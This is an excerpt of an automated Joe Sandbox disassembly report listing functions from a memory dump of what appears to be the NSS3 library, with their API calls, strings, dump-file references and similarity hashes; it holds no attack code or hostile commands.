Function 6C73CE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C73CF4C
free.MOZGLUE(?), ref: 6C73CF86

Strings

/G6/, xrefs: 6C73CE7D

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Errorfree
String ID: /G6/
API String ID: 4048819709-570549270
Opcode ID: 53592ee9a2041020bce0cb7671635cfeba659e6b98a4896e6399ecfecbdc96b9
Instruction ID: e4614191c1a89755b50f58d5ca5a2b8f7d5e86d77500da5f8f32b11b7d832c78
Opcode Fuzzy Hash: 53592ee9a2041020bce0cb7671635cfeba659e6b98a4896e6399ecfecbdc96b9
Instruction Fuzzy Hash: 9F31B732D05B368FD720EF29C904666B3B0BF45329B15D76DD86E6BA52D730E980CB90

Function 6C74AC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C74ACDC

Part of subcall function 6C7606A0: TlsGetValue.KERNEL32 ref: 6C7606C2
Part of subcall function 6C7606A0: EnterCriticalSection.KERNEL32(?), ref: 6C7606D6
Part of subcall function 6C7606A0: PR_Unlock.NSS3 ref: 6C7606EB

Part of subcall function 6C763810: TlsGetValue.KERNEL32(?,6C74A8F0,?,00000000), ref: 6C763827
Part of subcall function 6C763810: EnterCriticalSection.KERNEL32(?,?,6C74A8F0,?,00000000), ref: 6C763840
Part of subcall function 6C763810: TlsGetValue.KERNEL32(?,?,?,6C74A8F0,?,00000000), ref: 6C76385A
Part of subcall function 6C763810: EnterCriticalSection.KERNEL32(?,?,?,?,6C74A8F0,?,00000000), ref: 6C76386F
Part of subcall function 6C763810: PL_HashTableLookup.NSS3(?,?,?,?,?,6C74A8F0,?,00000000), ref: 6C763888
Part of subcall function 6C763810: PR_Unlock.NSS3(?,?,?,?,?,6C74A8F0,?,00000000), ref: 6C763895
Part of subcall function 6C763810: PR_Unlock.NSS3(?,?,?,?,?,6C74A8F0,?,00000000), ref: 6C7638B6

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,6C7B4E82,?), ref: 6C74ACB7

Part of subcall function 6C79F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,6C73F379,?,00000000,-00000002), ref: 6C79F9B7

Strings

/G6/, xrefs: 6C74AC5C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Util$AllocArenaErrorHashItem_LookupMark_Table
String ID: /G6/
API String ID: 3179275099-570549270
Opcode ID: 381607eb185908b83845c8ad65304806fe213b3efa90bd29827976ecfc08dcf0
Instruction ID: 79e42b03c3c959d406cf546d7efd698039e6b3b77873f317f3fb4788b0e09ee9
Opcode Fuzzy Hash: 381607eb185908b83845c8ad65304806fe213b3efa90bd29827976ecfc08dcf0
Instruction Fuzzy Hash: 212108B1A012055FE7548F29DF48FB777A8AF44A68F148038ED15CBB40FB21E804C7A1

Function 6C75C8F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE041,00000000), ref: 6C75C947

Strings

/G6/, xrefs: 6C75C8FF
Oxl, xrefs: 6C75C8F0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Error
String ID: /G6/$Oxl
API String ID: 2619118453-2330190646
Opcode ID: b6eea28cb90dc0496ea23d6dac873b91a9ce37c8c0d0578d716d4143c8629167
Instruction ID: 9d92b3be7aec9bbff71711908657ca450d1b646a25af9a0bd36df3a54c8790fc
Opcode Fuzzy Hash: b6eea28cb90dc0496ea23d6dac873b91a9ce37c8c0d0578d716d4143c8629167
Instruction Fuzzy Hash: 1231CEB1A022149FCB04CF45CAC0B8ABBB2AF89318FA48228E8051F745D770A954CBD0

Function 6C76AD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 6C76A4D0: PL_strncasecmp.NSS3(6C7428AD,pkcs11:,00000007), ref: 6C76A501
Part of subcall function 6C76A4D0: PORT_Strdup_Util.NSS3(6C7428AD), ref: 6C76A514
Part of subcall function 6C76A4D0: strchr.VCRUNTIME140(00000000,0000003A), ref: 6C76A529

PR_Now.NSS3 ref: 6C76ADA8

Part of subcall function 6C809DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DC6
Part of subcall function 6C809DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C850A27), ref: 6C809DD1
Part of subcall function 6C809DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C809DED

CERT_NewCertList.NSS3 ref: 6C76ADB5

Part of subcall function 6C742F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C742F0A
Part of subcall function 6C742F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C742F1D

Part of subcall function 6C75FE20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6C75FE6A
Part of subcall function 6C75FE20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6C75FE7E
Part of subcall function 6C75FE20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,?), ref: 6C75FE96
Part of subcall function 6C75FE20: CERT_GetCertTrust.NSS3(?,?), ref: 6C75FEB8

Part of subcall function 6C743360: PORT_ArenaAlloc_Util.NSS3(60EC83F8,00000010,?,00000000,?,?,?,6C74A708,?,00000000,6C743100,?,6C74A2FA,00000000), ref: 6C74336F

Strings

/G6/, xrefs: 6C76AD92

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Time$Alloc_ArenaCertSystem$Arena_CriticalEnterFileL_strncasecmpListSectionStrdup_TrustUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strchr
String ID: /G6/
API String ID: 3699053031-570549270
Opcode ID: 7677a9dc0c6ef63a6f2c096d9a162415d0e89a36f87253ee251e6069b393aad7
Instruction ID: 124697a97c6293897e67e05acd1fa05d18b11a9ad7d68cf1b3862917bec5d668
Opcode Fuzzy Hash: 7677a9dc0c6ef63a6f2c096d9a162415d0e89a36f87253ee251e6069b393aad7
Instruction Fuzzy Hash: 5011C8B1A043119BD700DF2ACE4959BB799AF8422CF548839ED5547B45EB30E918C6D2

Function 6C752C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C793440: PK11_GetAllTokens.NSS3 ref: 6C793481
Part of subcall function 6C793440: PR_SetError.NSS3(00000000,00000000), ref: 6C7934A3
Part of subcall function 6C793440: TlsGetValue.KERNEL32 ref: 6C79352E
Part of subcall function 6C793440: EnterCriticalSection.KERNEL32(?), ref: 6C793542
Part of subcall function 6C793440: PR_Unlock.NSS3(?), ref: 6C79355B

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,00080000,00080800,?,?,?,?,?,?,?,?), ref: 6C752CC1

Part of subcall function 6C766D90: memcpy.VCRUNTIME140(?,6C86A8EC,0000006C), ref: 6C766DC6
Part of subcall function 6C766D90: memcpy.VCRUNTIME140(?,6C86A958,0000006C), ref: 6C766DDB
Part of subcall function 6C766D90: memcpy.VCRUNTIME140(?,6C86A9C4,00000078), ref: 6C766DF1
Part of subcall function 6C766D90: memcpy.VCRUNTIME140(?,6C86AA3C,0000006C), ref: 6C766E06
Part of subcall function 6C766D90: memcpy.VCRUNTIME140(?,6C86AAA8,00000060), ref: 6C766E1C
Part of subcall function 6C766D90: PR_SetError.NSS3(FFFFE005,00000000), ref: 6C766E38

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,00080000,00080800,?), ref: 6C752CE8

Part of subcall function 6C766D90: PK11_DoesMechanism.NSS3(?,?), ref: 6C766E76
Part of subcall function 6C766D90: TlsGetValue.KERNEL32 ref: 6C76726F
Part of subcall function 6C766D90: EnterCriticalSection.KERNEL32(?), ref: 6C767283

Strings

/G6/, xrefs: 6C752C7C

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memcpy$K11_$CriticalEnterErrorFlagsGeneratePairSectionValueWith$DoesMechanismTokensUnlock
String ID: /G6/
API String ID: 2473486326-570549270
Opcode ID: 093325070dc83d0fb38b8f0127aa587846033f8fcc69b4ec7b1bb08a953a74c8
Instruction ID: 5a31d48d231bfc7bc59dc974ecb821f644fdbeed2d3e417d4a2b585bf9039b15
Opcode Fuzzy Hash: 093325070dc83d0fb38b8f0127aa587846033f8fcc69b4ec7b1bb08a953a74c8
Instruction Fuzzy Hash: 7C110CB17002087BEB115A569D4AFEB366DAB45748F500030FF44AE680FF72E91887E1

Function 6C7969E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C796A47
memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 6C796A64

Strings

/G6/, xrefs: 6C7969F1

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtilmemcpy
String ID: /G6/
API String ID: 9930719-570549270
Opcode ID: 4f36a3f25800bf25abe5ae91880dfe72279cc4ecf29c6fcf68866a5cf883d849
Instruction ID: 0304ce86b0ab8abd9e0a78a9b44a5b71a1960acdd23c7aeccdd261715035c112
Opcode Fuzzy Hash: 4f36a3f25800bf25abe5ae91880dfe72279cc4ecf29c6fcf68866a5cf883d849
Instruction Fuzzy Hash: 5B112931E002489BDB688AADEC647AFBB65EFC1310F14C23DD84A5B7C2D9709A08C7D1

Function 6C7568F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,00000000), ref: 6C75690C

Part of subcall function 6C79BE30: SECOID_FindOID_Util.NSS3(6C75311B,00000000,?,6C75311B,?), ref: 6C79BE44

PR_SetError.NSS3(FFFFE00A,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C756946

Part of subcall function 6C7EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7EC2BF

Strings

/G6/, xrefs: 6C7568FE

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$AlgorithmErrorFindTag_Value
String ID: /G6/
API String ID: 778764003-570549270
Opcode ID: d8bc3c4f12b8436d077f379a359f59c86faa180f6fb3041dcd30a9ec59935f6e
Instruction ID: 4e1c505ca529afafc8c0cf2c833072b81e4543ffcd3fac34da63ac03798b4563
Opcode Fuzzy Hash: d8bc3c4f12b8436d077f379a359f59c86faa180f6fb3041dcd30a9ec59935f6e
Instruction Fuzzy Hash: 95118276B0010A6BDF009E69ED049BF3B69EF84618F554038ED19D7700EB31AA2887A1

Function 6C766CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE028,00000000,6C754D85,?,6C7820B1,6C754D85,?,?,6C754D85,?), ref: 6C766D10

Part of subcall function 6C781940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C78563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C78195C
Part of subcall function 6C781940: EnterCriticalSection.KERNEL32(?,?,6C78563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C75EAC5,00000001), ref: 6C781970
Part of subcall function 6C781940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C75EAC5,00000001,?,6C75CE9B,00000001,6C75EAC5), ref: 6C7819A0

free.MOZGLUE(6C754D85,?,?,?,?,?,6C754D85,?,6C7820B1,6C754D85,?,?,6C754D85,?), ref: 6C766D3E

Strings

/G6/, xrefs: 6C766CBA

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValuefree
String ID: /G6/
API String ID: 2146238652-570549270
Opcode ID: e1502a41219244c1c6a486e59f78de125ec16aeac6c674f2c12a5830070ac893
Instruction ID: dffd38f504d30ae0ec44fe3447567c1216fa83dad567c8290ed6e273b40802a9
Opcode Fuzzy Hash: e1502a41219244c1c6a486e59f78de125ec16aeac6c674f2c12a5830070ac893
Instruction Fuzzy Hash: 99115C70E00214ABDF10EFA9DD06BAA77B4AF05308F544075EC05ABB81D7319A04C7D1

Function 6C830900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?), ref: 6C830917
sqlite3_value_text.NSS3(?), ref: 6C830923

Part of subcall function 6C6F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C6C2352,?,00000000,?,?), ref: 6C6F1413
Part of subcall function 6C6F13C0: memcpy.VCRUNTIME140(00000000,R#ll,00000002,?,?,?,?,6C6C2352,?,00000000,?,?), ref: 6C6F14C0

Strings

error in %s %s%s%s: %s, xrefs: 6C830944

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_value_text$memcpystrlen
String ID: error in %s %s%s%s: %s
API String ID: 1937290486-1007276823
Opcode ID: 5246d06c76b82a6c992b2ae1494b594387ad302937612a6f188fdb4cbdbac64a
Instruction ID: 8e38d5731aa1ffa97b298380141aa6bd7a21a11f9807ecdf766034cc1b1eeb35
Opcode Fuzzy Hash: 5246d06c76b82a6c992b2ae1494b594387ad302937612a6f188fdb4cbdbac64a
Instruction Fuzzy Hash: 4A0148B6E001089BD7109E68EE019BB77B5EFC5208F144439ED485B711F732AD1483E1

Function 6C768AB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C768AC2

Part of subcall function 6C742F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C742F0A
Part of subcall function 6C742F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C742F1D

Part of subcall function 6C785730: free.MOZGLUE(00000000,?,?,?,?,?,?,6C768B33,?,?), ref: 6C7857A5

SECKEY_DestroyPrivateKeyList.NSS3(00000000), ref: 6C768B3B

Part of subcall function 6C7546C0: PK11_DestroyObject.NSS3(?,?), ref: 6C7546E7
Part of subcall function 6C7546C0: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C75470A
Part of subcall function 6C7546C0: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75472F

Strings

/G6/, xrefs: 6C768AB8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Arena_$DestroyFreeList$Alloc_ArenaCertK11_ObjectPrivatefree
String ID: /G6/
API String ID: 3202098065-570549270
Opcode ID: 33517a2365dd94e2a3b7d47affcccd610220aec94cb944834d3ecbfaacba2c16
Instruction ID: e2e9e9f5a9e4696380f10040b157f1726dc3905adbc8f4ae6c19abb8bad87228
Opcode Fuzzy Hash: 33517a2365dd94e2a3b7d47affcccd610220aec94cb944834d3ecbfaacba2c16
Instruction Fuzzy Hash: 0C114CB0D012098BEB04CFAAD9097DEFBF4BF05308F14816AD809AB741E7759609CBD5

Function 6C752DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C74C0D2,6C74C0CE,00000000,-000000D4,?), ref: 6C752DF5

Part of subcall function 6C79BF20: SECITEM_CopyItem_Util.NSS3(-00000004,-000000D4,6C752DFA,00000000,-000000D4,6C74C0CE,?,6C752DFA,-000000D4,-00000004,6C74C0D2,6C74C0CE,00000000,-000000D4,?), ref: 6C79BF32
Part of subcall function 6C79BF20: SECITEM_CopyItem_Util.NSS3(-00000004,-000000E0,6C752DEE,-000000D4,-00000004,6C74C0D2,6C74C0CE,00000000,-000000D4,?), ref: 6C79BF47

SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C74C0CE,00000000,-000000D4,?), ref: 6C752E27

Part of subcall function 6C79FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C798D2D,?,00000000,?), ref: 6C79FB85
Part of subcall function 6C79FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C79FBB1

Strings

/G6/, xrefs: 6C752DE2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Copy$Item_$AlgorithmAlloc_Arenamemcpy
String ID: /G6/
API String ID: 2899196045-570549270
Opcode ID: bd415bbe79d62fa114c6b7baf570a4f0a2d6856f312bf67a406f529f7094fc3d
Instruction ID: 393c7a4d71e4508760c09009cc6539a29f319d781bbd8a0b839ad101a7ff7dda
Opcode Fuzzy Hash: bd415bbe79d62fa114c6b7baf570a4f0a2d6856f312bf67a406f529f7094fc3d
Instruction Fuzzy Hash: 881161B1A001099BD705CF29D9959BB77B8EF492187048269EC099F302EB31E915CBE0

Function 6C816A90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 6C816B20: sqlite3_snprintf.NSS3(?,6C816AC0,6C87AAF9,00000000,?,6C816AC0,?), ref: 6C816BA9
Part of subcall function 6C816B20: sqlite3_free.NSS3(00000000,?,?,?,?,?,6C816AC0,?), ref: 6C816BB2

sqlite3_log.NSS3(0000070A,os_win.c:%d: (%lu) %s(%s) - %s,6C6D0CF7,00000000,?,6C890148,?), ref: 6C816AFD

Strings

os_win.c:%d: (%lu) %s(%s) - %s, xrefs: 6C816AF7
/G6/, xrefs: 6C816AA0

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_logsqlite3_snprintf
String ID: /G6/$os_win.c:%d: (%lu) %s(%s) - %s
API String ID: 3072194420-2641172965
Opcode ID: 6c44e5b77e68b1f21246aa1418be95ccc9b4ce672491bac79a3c22049d26ce71
Instruction ID: ad337e9cf691c8663eba7c7355f6327afa84eb1ac4a31ec2d01c628d06ac98a7
Opcode Fuzzy Hash: 6c44e5b77e68b1f21246aa1418be95ccc9b4ce672491bac79a3c22049d26ce71
Instruction Fuzzy Hash: C701F5717041695BDB248A1D9D90BFB7BE9EF46314F444878F569CA640DA30990487A2

Function 6C7B4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8{l,00000000,00000000,?,?,6C7B3827,?,00000000), ref: 6C7B4D0A

Part of subcall function 6C7A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7A08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C7B4D22

Part of subcall function 6C79FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C741A3E,00000048,00000054), ref: 6C79FD56

Strings

'8{l, xrefs: 6C7B4D07

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

